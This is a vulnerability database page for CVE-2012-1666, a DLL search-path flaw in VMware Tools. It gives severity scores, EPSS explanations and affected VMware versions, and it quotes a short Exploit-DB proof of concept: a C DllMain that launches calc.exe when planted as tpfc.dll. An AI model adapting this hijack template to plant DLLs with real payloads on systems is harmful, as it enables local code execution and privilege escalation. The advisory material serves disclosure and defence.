CVE-2012-1666 : Detail

CVE-2012-1666

0.06%V3
Local
2012-09-08
10h00 +00:00
2024-09-17
01h56 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in VMware Tools in VMware Workstation before 8.0.4, VMware Player before 4.0.4, VMware Fusion before 4.1.2, VMware View before 5.1, and VMware ESX 4.1 before U3 and 5.0 before P03 allows local users to gain privileges via a Trojan horse tpfc.dll file in the current working directory.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.9 AV:L/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 37780

Publication date : 2012-09-03 22h00 +00:00
Author : Moshe Zioni
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/55421/info ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code. Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. #include <windows.h> int hijack_poc () { WinExec ( "calc.exe" , SW_NORMAL ); return 0 ; } BOOL WINAPI DllMain ( HINSTANCE hinstDLL , DWORD dwReason , LPVOID lpvReserved ) { hijack_poc () ; return 0 ; }

Products Mentioned

Configuraton 0

Vmware>>Workstation >> Version To (including) 8.0.3

Vmware>>Workstation >> Version 8.0

Vmware>>Workstation >> Version 8.0.0.18997

Vmware>>Workstation >> Version 8.0.1

Vmware>>Workstation >> Version 8.0.1.27038

Vmware>>Workstation >> Version 8.0.2

Configuraton 0

Vmware>>Player >> Version To (including) 4.0.3

Vmware>>Player >> Version 4.0

Vmware>>Player >> Version 4.0.0.18997

Vmware>>Player >> Version 4.0.1

Vmware>>Player >> Version 4.0.2

Configuraton 0

Vmware>>Fusion >> Version To (including) 4.1.1

Vmware>>Fusion >> Version 4.0

Vmware>>Fusion >> Version 4.0.1

Vmware>>Fusion >> Version 4.0.2

Vmware>>Fusion >> Version 4.1

Configuraton 0

Vmware>>View >> Version To (including) 5.0

Vmware>>View >> Version 4.6.0

Configuraton 0

Vmware>>Esx >> Version 4.1

Vmware>>Esx >> Version 5.0

References